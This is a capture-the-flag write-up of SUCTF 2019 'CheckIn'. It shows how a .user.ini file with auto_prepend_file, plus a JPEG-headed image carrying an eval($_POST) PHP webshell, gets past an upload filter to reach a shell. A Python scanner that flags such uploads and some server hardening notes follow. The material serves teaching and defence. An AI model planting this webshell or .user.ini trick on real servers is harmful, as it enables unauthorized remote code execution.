(PHP backdoor via the .user.ini configuration file) [SUCTF 2019] CheckIn

 

Reference blog: https://www.cnblogs.com/20175211lyz/p/11455355.html

First, a look at the .user.ini file.

 

 

Using a .user.ini upload as a hidden backdoor

Reference link: the PHP backdoor built from the .user.ini file

Conditions:

  • 1. The server-side scripting language is PHP
  • 2. The server runs PHP in CGI / FastCGI mode
  • 3. The upload directory contains an executable PHP file

For this challenge, the hint is that a file upload is needed to get a shell. Uploading a one-line webshell gets a prompt to upload an image instead, and uploading an image webshell shows that <? is filtered. Blog posts by other experts then show that a .user.ini file can be uploaded:

auto_prepend_file=test.jpg (an image file header, FFD8FFE000104A4649460D0A, needs to be added)

Then upload the image webshell:

<script language="php">eval($_POST['a']);</script> (the image file header above also needs to be added)

 

At this point the shell can be reached with POST requests.

Then scan the files to see what is there.

 

The flag is then read with the ReadFile() function.
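
From the defender's side, the upload pair described above (a .user.ini carrying auto_prepend_file plus an image carrying a PHP open tag) can be flagged by inspecting an upload directory. The following Python code is an added example, not part of the original write-up; the function names and the sample files are constructed for illustration.

```python
import re

# Directives that make PHP include a file on every request served from the directory.
INI_DIRECTIVE = re.compile(
    rb"^[ \t]*(auto_prepend_file|auto_append_file)[ \t]*=[ \t]*[\"']?([^\s\"';]+)",
    re.I | re.M)
# PHP open tags: <?php, <?=, "<? " and the <script language="php"> form.
PHP_TAG = re.compile(rb"<\?(?:php|=|\s)|<script[^>]*language\s*=\s*[\"']?php", re.I)
IMAGE_EXT = (".jpg", ".jpeg", ".png", ".gif")

def inspect_upload(name: str, data: bytes) -> dict:
    """Return the suspicious properties of a single uploaded file."""
    base = name.rsplit("/", 1)[-1].lower()
    targets = [m.group(2).decode("latin-1") for m in INI_DIRECTIVE.finditer(data)]
    return {
        "is_user_ini": base == ".user.ini",
        "include_targets": targets,
        "php_in_image": base.endswith(IMAGE_EXT) and bool(PHP_TAG.search(data)),
    }

def scan_uploads(files: dict) -> list:
    """files maps names in ONE upload directory to their bytes; returns findings."""
    info = {name: inspect_upload(name, data) for name, data in files.items()}
    findings = []
    for name, i in info.items():
        if i["is_user_ini"] or i["include_targets"]:
            findings.append((name, "ini-directive", ",".join(i["include_targets"])))
        if i["php_in_image"]:
            findings.append((name, "php-in-image", ""))
        # Strongest signal: the INI file points at another upload that carries PHP.
        for target in i["include_targets"]:
            if info.get(target, {}).get("php_in_image"):
                findings.append((name, "prepend-chain", target))
    return findings

# Constructed sample uploads (not taken from the challenge server). The header is
# the one quoted in the write-up; it ends in CRLF, so the directive starts a new
# line. The PHP body is a harmless placeholder.
HEADER = bytes.fromhex("FFD8FFE000104A4649460D0A")
SAMPLE = {
    ".user.ini": HEADER + b"auto_prepend_file=test.jpg\n",
    "test.jpg": HEADER + b'<script language="php">echo 1;</script>',
    "cat.jpg": HEADER + b"\x00\x10plain image bytes",
}

if __name__ == "__main__":
    for finding in scan_uploads(SAMPLE):
        print(finding)
```

On the server side, setting user_ini.filename to an empty string in php.ini stops PHP from scanning for per-directory INI files, and the <script language="php"> tag is no longer parsed from PHP 7.0 onward.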

 

 

 


Origin www.cnblogs.com/MisakaYuii-Z/p/12290471.html